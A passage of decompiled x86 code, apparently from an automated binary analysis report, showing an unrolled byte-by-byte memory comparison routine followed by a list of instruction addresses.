								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
								if(__esi == 0) {
									L329:
									__esi =  *(__eax - 0x15) & 0x000000ff;
									__edx =  *(__ecx - 0x15) & 0x000000ff;
									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
									if(__esi == 0) {
										L331:
										__esi =  *(__eax - 0x14) & 0x000000ff;
										__edx =  *(__ecx - 0x14) & 0x000000ff;
										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L334;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L331;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L329;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L327;
						case 0x18:
							L101:
							__edx =  *(__eax - 0x18);
							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
								__esi = 0;
								L438:
								if(__esi == 0) {
									goto L408;
								}
								goto L411;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x18) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
							if(__esi == 0) {
								L104:
								__esi =  *(__eax - 0x17) & 0x000000ff;
								__edx =  *(__ecx - 0x17) & 0x000000ff;
								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
								if(__esi == 0) {
									L106:
									__esi =  *(__eax - 0x16) & 0x000000ff;
									__edx =  *(__ecx - 0x16) & 0x000000ff;
									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
									if(__esi == 0) {
										L108:
										__esi =  *(__eax - 0x15) & 0x000000ff;
										__edx =  *(__ecx - 0x15) & 0x000000ff;
										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L438;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L108;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L106;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L104;
						case 0x19:
							L153:
							__edx =  *(__eax - 0x19);
							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
								__esi = 0;
								L163:
								if(__esi != 0) {
									goto L411;
								}
								goto L164;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x19) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
							if(__esi == 0) {
								L156:
								__esi =  *(__eax - 0x18) & 0x000000ff;
								__edx =  *(__ecx - 0x18) & 0x000000ff;
								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
								if(__esi == 0) {
									L158:
									__esi =  *(__eax - 0x17) & 0x000000ff;
									__edx =  *(__ecx - 0x17) & 0x000000ff;
									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
									if(__esi == 0) {
										L160:
										__esi =  *(__eax - 0x16) & 0x000000ff;
										__edx =  *(__ecx - 0x16) & 0x000000ff;
										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L163;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L160;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L158;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L156;
						case 0x1a:
							L232:
							__edx =  *(__eax - 0x1a);
							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
								__esi = 0;
								L242:
								if(__esi != 0) {
									goto L411;
								}
								goto L243;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L235:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi == 0) {
									L237:
									__esi =  *(__eax - 0x18) & 0x000000ff;
									__edx =  *(__ecx - 0x18) & 0x000000ff;
									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
									if(__esi == 0) {
										L239:
										__esi =  *(__eax - 0x17) & 0x000000ff;
										__edx =  *(__ecx - 0x17) & 0x000000ff;
										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L242;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L239;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L237;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L235;
						case 0x1b:
							L313:
							__edx =  *(__eax - 0x1b);
							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
								__esi = 0;
								L323:
								if(__esi != 0) {
									goto L411;
								}
								goto L324;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L316:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi == 0) {
									L318:
									__esi =  *(__eax - 0x19) & 0x000000ff;
									__edx =  *(__ecx - 0x19) & 0x000000ff;
									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
									if(__esi == 0) {
										L320:
										__esi =  *(__eax - 0x18) & 0x000000ff;
										__edx =  *(__ecx - 0x18) & 0x000000ff;
										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L323;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L320;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L318;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L316;
						case 0x1c:
							__edx =  *(__eax - 0x1c);
							if( *(__eax - 0x1c) ==  *(__ecx - 0x1c)) {
								__esi = 0;
								L100:
								if(__esi != 0) {
									goto L411;
								}
								goto L101;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L93:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi == 0) {
									L95:
									__esi =  *(__eax - 0x1a) & 0x000000ff;
									__edx =  *(__ecx - 0x1a) & 0x000000ff;
									__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
									if(__esi == 0) {
										L97:
										__esi =  *(__eax - 0x19) & 0x000000ff;
										__edx =  *(__ecx - 0x19) & 0x000000ff;
										__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L100;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L97;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L95;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L93;
						case 0x1d:
							__edx =  *(__eax - 0x1d);
							if( *(__eax - 0x1d) ==  *(__ecx - 0x1d)) {
								__esi = 0;
								L152:
								if(__esi != 0) {
									goto L411;
								}
								goto L153;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L145:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi == 0) {
									L147:
									__esi =  *(__eax - 0x1b) & 0x000000ff;
									__edx =  *(__ecx - 0x1b) & 0x000000ff;
									__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
									if(__esi == 0) {
										L149:
										__esi =  *(__eax - 0x1a) & 0x000000ff;
										__edx =  *(__ecx - 0x1a) & 0x000000ff;
										__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L152;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L149;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L147;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L145;
						case 0x1e:
							__edx =  *(__eax - 0x1e);
							if( *(__eax - 0x1e) ==  *(__ecx - 0x1e)) {
								__esi = 0;
								L231:
								if(__esi != 0) {
									goto L411;
								}
								goto L232;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1e) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
							if(__esi == 0) {
								L224:
								__esi =  *(__eax - 0x1d) & 0x000000ff;
								__edx =  *(__ecx - 0x1d) & 0x000000ff;
								__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
								if(__esi == 0) {
									L226:
									__esi =  *(__eax - 0x1c) & 0x000000ff;
									__edx =  *(__ecx - 0x1c) & 0x000000ff;
									__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
									if(__esi == 0) {
										L228:
										__esi =  *(__eax - 0x1b) & 0x000000ff;
										__edx =  *(__ecx - 0x1b) & 0x000000ff;
										__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L231;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L228;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L226;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L224;
						case 0x1f:
							__edx =  *(__eax - 0x1f);
							if( *(__eax - 0x1f) ==  *(__ecx - 0x1f)) {
								__esi = 0;
								L312:
								if(__esi != 0) {
									L411:
									_t986 = _t1206;
									goto L412;
								}
								goto L313;
							}
							__edx =  *(__ecx - 0x1f) & 0x000000ff;
							__esi =  *(__eax - 0x1f) & 0x000000ff;
							__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
							if(__esi == 0) {
								L305:
								__esi =  *(__eax - 0x1e) & 0x000000ff;
								__edx =  *(__ecx - 0x1e) & 0x000000ff;
								__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
								if(__esi == 0) {
									L307:
									__esi =  *(__eax - 0x1d) & 0x000000ff;
									__edx =  *(__ecx - 0x1d) & 0x000000ff;
									__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
									if(__esi == 0) {
										L309:
										__esi =  *(__eax - 0x1c) & 0x000000ff;
										__edx =  *(__ecx - 0x1c) & 0x000000ff;
										__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L312;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L309;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L307;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L305;
					}
				}
				L1:
				if( *_t984 ==  *_t1118) {
					_t1206 = 0;
					L11:
					if(_t1206 != 0) {
						goto L411;
					}
					if( *(_t984 + 4) == _t1118[4]) {
						_t1206 = 0;
						L22:
						if(_t1206 != 0) {
							goto L411;
						}
						if( *(_t984 + 8) == _t1118[8]) {
							_t1206 = 0;
							L33:
							if(_t1206 != 0) {
								goto L411;
							}
							if( *(_t984 + 0xc) == _t1118[0xc]) {
								_t1206 = 0;
								L44:
								if(_t1206 != 0) {
									goto L411;
								}
								if( *(_t984 + 0x10) == _t1118[0x10]) {
									_t1206 = 0;
									L55:
									if(_t1206 != 0) {
										goto L411;
									}
									if( *(_t984 + 0x14) == _t1118[0x14]) {
										_t1206 = 0;
										L66:
										if(_t1206 != 0) {
											goto L411;
										}
										if( *(_t984 + 0x18) == _t1118[0x18]) {
											_t1206 = 0;
											L77:
											if(_t1206 != 0) {
												goto L411;
											}
											if( *(_t984 + 0x1c) == _t1118[0x1c]) {
												_t1206 = 0;
												L88:
												if(_t1206 != 0) {
													goto L411;
												} else {
													_t984 = _t984 + _t1124;
													_t1118 =  &(_t1118[_t1124]);
													_t1204 = _t1204 - _t1124;
													goto L405;
												}
											}
											_t1249 = ( *(_t984 + 0x1c) & 0x000000ff) - (_t1118[0x1c] & 0x000000ff);
											if(_t1249 == 0) {
												L81:
												_t1251 = ( *(_t984 + 0x1d) & 0x000000ff) - (_t1118[0x1d] & 0x000000ff);
												if(_t1251 == 0) {
													L83:
													_t1253 = ( *(_t984 + 0x1e) & 0x000000ff) - (_t1118[0x1e] & 0x000000ff);
													if(_t1253 == 0) {
														L85:
														_t1206 = ( *(_t984 + 0x1f) & 0x000000ff) - (_t1118[0x1f] & 0x000000ff);
														if(_t1206 != 0) {
															_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
														}
														goto L88;
													}
													_t1206 = (0 | _t1253 > 0x00000000) + (0 | _t1253 > 0x00000000) - 1;
													if(_t1206 != 0) {
														goto L411;
													}
													goto L85;
												}
												_t1206 = (0 | _t1251 > 0x00000000) + (0 | _t1251 > 0x00000000) - 1;
												if(_t1206 != 0) {
													goto L411;
												}
												goto L83;
											}
											_t1206 = (0 | _t1249 > 0x00000000) + (0 | _t1249 > 0x00000000) - 1;
											if(_t1206 != 0) {
												goto L411;
											}
											goto L81;
										}
										_t1256 = ( *(_t984 + 0x18) & 0x000000ff) - (_t1118[0x18] & 0x000000ff);
										if(_t1256 == 0) {
											L70:
											_t1258 = ( *(_t984 + 0x19) & 0x000000ff) - (_t1118[0x19] & 0x000000ff);
											if(_t1258 == 0) {
												L72:
												_t1260 = ( *(_t984 + 0x1a) & 0x000000ff) - (_t1118[0x1a] & 0x000000ff);
												if(_t1260 == 0) {
													L74:
													_t1206 = ( *(_t984 + 0x1b) & 0x000000ff) - (_t1118[0x1b] & 0x000000ff);
													if(_t1206 != 0) {
														_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
													}
													goto L77;
												}
												_t1206 = (0 | _t1260 > 0x00000000) + (0 | _t1260 > 0x00000000) - 1;
												if(_t1206 != 0) {
													goto L411;
												}
												goto L74;
											}
											_t1206 = (0 | _t1258 > 0x00000000) + (0 | _t1258 > 0x00000000) - 1;
											if(_t1206 != 0) {
												goto L411;
											}
											goto L72;
										}
										_t1206 = (0 | _t1256 > 0x00000000) + (0 | _t1256 > 0x00000000) - 1;
										if(_t1206 != 0) {
											goto L411;
										}
										goto L70;
									}
									_t1263 = ( *(_t984 + 0x14) & 0x000000ff) - (_t1118[0x14] & 0x000000ff);
									if(_t1263 == 0) {
										L59:
										_t1265 = ( *(_t984 + 0x15) & 0x000000ff) - (_t1118[0x15] & 0x000000ff);
										if(_t1265 == 0) {
											L61:
											_t1267 = ( *(_t984 + 0x16) & 0x000000ff) - (_t1118[0x16] & 0x000000ff);
											if(_t1267 == 0) {
												L63:
												_t1206 = ( *(_t984 + 0x17) & 0x000000ff) - (_t1118[0x17] & 0x000000ff);
												if(_t1206 != 0) {
													_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t1206 = (0 | _t1267 > 0x00000000) + (0 | _t1267 > 0x00000000) - 1;
											if(_t1206 != 0) {
												goto L411;
											}
											goto L63;
										}
										_t1206 = (0 | _t1265 > 0x00000000) + (0 | _t1265 > 0x00000000) - 1;
										if(_t1206 != 0) {
											goto L411;
										}
										goto L61;
									}
									_t1206 = (0 | _t1263 > 0x00000000) + (0 | _t1263 > 0x00000000) - 1;
									if(_t1206 != 0) {
										goto L411;
									}
									goto L59;
								}
								_t1270 = ( *(_t984 + 0x10) & 0x000000ff) - (_t1118[0x10] & 0x000000ff);
								if(_t1270 == 0) {
									L48:
									_t1272 = ( *(_t984 + 0x11) & 0x000000ff) - (_t1118[0x11] & 0x000000ff);
									if(_t1272 == 0) {
										L50:
										_t1274 = ( *(_t984 + 0x12) & 0x000000ff) - (_t1118[0x12] & 0x000000ff);
										if(_t1274 == 0) {
											L52:
											_t1206 = ( *(_t984 + 0x13) & 0x000000ff) - (_t1118[0x13] & 0x000000ff);
											if(_t1206 != 0) {
												_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t1206 = (0 | _t1274 > 0x00000000) + (0 | _t1274 > 0x00000000) - 1;
										if(_t1206 != 0) {
											goto L411;
										}
										goto L52;
									}
									_t1206 = (0 | _t1272 > 0x00000000) + (0 | _t1272 > 0x00000000) - 1;
									if(_t1206 != 0) {
										goto L411;
									}
									goto L50;
								}
								_t1206 = (0 | _t1270 > 0x00000000) + (0 | _t1270 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L48;
							}
							_t1277 = ( *(_t984 + 0xc) & 0x000000ff) - (_t1118[0xc] & 0x000000ff);
							if(_t1277 == 0) {
								L37:
								_t1279 = ( *(_t984 + 0xd) & 0x000000ff) - (_t1118[0xd] & 0x000000ff);
								if(_t1279 == 0) {
									L39:
									_t1281 = ( *(_t984 + 0xe) & 0x000000ff) - (_t1118[0xe] & 0x000000ff);
									if(_t1281 == 0) {
										L41:
										_t1206 = ( *(_t984 + 0xf) & 0x000000ff) - (_t1118[0xf] & 0x000000ff);
										if(_t1206 != 0) {
											_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t1206 = (0 | _t1281 > 0x00000000) + (0 | _t1281 > 0x00000000) - 1;
									if(_t1206 != 0) {
										goto L411;
									}
									goto L41;
								}
								_t1206 = (0 | _t1279 > 0x00000000) + (0 | _t1279 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L39;
							}
							_t1206 = (0 | _t1277 > 0x00000000) + (0 | _t1277 > 0x00000000) - 1;
							if(_t1206 != 0) {
								goto L411;
							}
							goto L37;
						}
						_t1284 = ( *(_t984 + 8) & 0x000000ff) - (_t1118[8] & 0x000000ff);
						if(_t1284 == 0) {
							L26:
							_t1286 = ( *(_t984 + 9) & 0x000000ff) - (_t1118[9] & 0x000000ff);
							if(_t1286 == 0) {
								L28:
								_t1288 = ( *(_t984 + 0xa) & 0x000000ff) - (_t1118[0xa] & 0x000000ff);
								if(_t1288 == 0) {
									L30:
									_t1206 = ( *(_t984 + 0xb) & 0x000000ff) - (_t1118[0xb] & 0x000000ff);
									if(_t1206 != 0) {
										_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t1206 = (0 | _t1288 > 0x00000000) + (0 | _t1288 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L30;
							}
							_t1206 = (0 | _t1286 > 0x00000000) + (0 | _t1286 > 0x00000000) - 1;
							if(_t1206 != 0) {
								goto L411;
							}
							goto L28;
						}
						_t1206 = (0 | _t1284 > 0x00000000) + (0 | _t1284 > 0x00000000) - 1;
						if(_t1206 != 0) {
							goto L411;
						}
						goto L26;
					}
					_t1291 = ( *(_t984 + 4) & 0x000000ff) - (_t1118[4] & 0x000000ff);
					if(_t1291 == 0) {
						L15:
						_t1293 = ( *(_t984 + 5) & 0x000000ff) - (_t1118[5] & 0x000000ff);
						if(_t1293 == 0) {
							L17:
							_t1295 = ( *(_t984 + 6) & 0x000000ff) - (_t1118[6] & 0x000000ff);
							if(_t1295 == 0) {
								L19:
								_t1206 = ( *(_t984 + 7) & 0x000000ff) - (_t1118[7] & 0x000000ff);
								if(_t1206 != 0) {
									_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t1206 = (0 | _t1295 > 0x00000000) + (0 | _t1295 > 0x00000000) - 1;
							if(_t1206 != 0) {
								goto L411;
							}
							goto L19;
						}
						_t1206 = (0 | _t1293 > 0x00000000) + (0 | _t1293 > 0x00000000) - 1;
						if(_t1206 != 0) {
							goto L411;
						}
						goto L17;
					}
					_t1206 = (0 | _t1291 > 0x00000000) + (0 | _t1291 > 0x00000000) - 1;
					if(_t1206 != 0) {
						goto L411;
					}
					goto L15;
				}
				_t1298 = ( *_t984 & 0x000000ff) - ( *_t1118 & 0x000000ff);
				if(_t1298 == 0) {
					L4:
					_t1300 = ( *(_t984 + 1) & 0x000000ff) - (_t1118[1] & 0x000000ff);
					if(_t1300 == 0) {
						L6:
						_t1302 = ( *(_t984 + 2) & 0x000000ff) - (_t1118[2] & 0x000000ff);
						if(_t1302 == 0) {
							L8:
							_t1206 = ( *(_t984 + 3) & 0x000000ff) - (_t1118[3] & 0x000000ff);
							if(_t1206 != 0) {
								_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
							}
							goto L11;
						}
						_t1206 = (0 | _t1302 > 0x00000000) + (0 | _t1302 > 0x00000000) - 1;
						if(_t1206 != 0) {
							goto L411;
						}
						goto L8;
					}
					_t1206 = (0 | _t1300 > 0x00000000) + (0 | _t1300 > 0x00000000) - 1;
					if(_t1206 != 0) {
						goto L411;
					}
					goto L6;
				}
				_t1206 = (0 | _t1298 > 0x00000000) + (0 | _t1298 > 0x00000000) - 1;
				if(_t1206 != 0) {
					goto L411;
				}
				goto L4;
			}





































                                                0x0090230c
                                                0x00902311
                                                0x00902314
                                                0x00000000
                                                0x0090231a
                                                0x0090231a
                                                0x0090231b
                                                0x0090226f
                                                0x00902272
                                                0x00902275
                                                0x00902278
                                                0x009021d3
                                                0x009021d3
                                                0x009021d5
                                                0x0090238e
                                                0x0090238e
                                                0x0090238e
                                                0x009021df
                                                0x009021e2
                                                0x009021e6
                                                0x00000000
                                                0x009021e6
                                                0x00902321
                                                0x00902322
                                                0x0090223d
                                                0x00902240
                                                0x00902243
                                                0x00902249
                                                0x0090224b
                                                0x00902262
                                                0x00902262
                                                0x00902266
                                                0x00000000
                                                0x00902266
                                                0x00902251
                                                0x00902258
                                                0x0090225c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090225c
                                                0x00902328
                                                0x00902329
                                                0x009021ed
                                                0x009021f0
                                                0x009021f3
                                                0x009021f9
                                                0x009021fb
                                                0x00902212
                                                0x00902212
                                                0x0090221a
                                                0x0090221c
                                                0x00902233
                                                0x00902233
                                                0x00902237
                                                0x00000000
                                                0x00902237
                                                0x00902222
                                                0x00902229
                                                0x0090222d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090222d
                                                0x00902201
                                                0x00902208
                                                0x0090220c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090220c
                                                0x00902330
                                                0x00902164
                                                0x00902167
                                                0x0090216a
                                                0x00902170
                                                0x00902172
                                                0x00902189
                                                0x00902189
                                                0x00902191
                                                0x00902193
                                                0x009021aa
                                                0x009021aa
                                                0x009021b2
                                                0x009021b4
                                                0x009021cb
                                                0x009021cb
                                                0x009021cf
                                                0x00000000
                                                0x009021cf
                                                0x009021ba
                                                0x009021c1
                                                0x009021c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009021c5
                                                0x00902199
                                                0x009021a0
                                                0x009021a4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009021a4
                                                0x00902178
                                                0x0090217f
                                                0x00902183
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00902183
                                                0x00902336
                                                0x00902339
                                                0x00000000
                                                0x00902340
                                                0x00000000
                                                0x00000000
                                                0x00902348
                                                0x0090234a
                                                0x0090234f
                                                0x00902558
                                                0x00902558
                                                0x0090238a
                                                0x00000000
                                                0x0090238a
                                                0x00902355
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090190d
                                                0x0090190d
                                                0x00901911
                                                0x00901915
                                                0x00901917
                                                0x00901921
                                                0x00901924
                                                0x00901928
                                                0x00901928
                                                0x00000000
                                                0x00000000
                                                0x00901d19
                                                0x00901d21
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090213a
                                                0x0090213a
                                                0x0090213e
                                                0x00902142
                                                0x00902144
                                                0x00901d27
                                                0x00901d27
                                                0x00901d2b
                                                0x00901d2f
                                                0x00901d31
                                                0x00000000
                                                0x00000000
                                                0x00901d3b
                                                0x00901d3e
                                                0x00901d44
                                                0x00000000
                                                0x00000000
                                                0x0090215d
                                                0x0090215d
                                                0x00000000
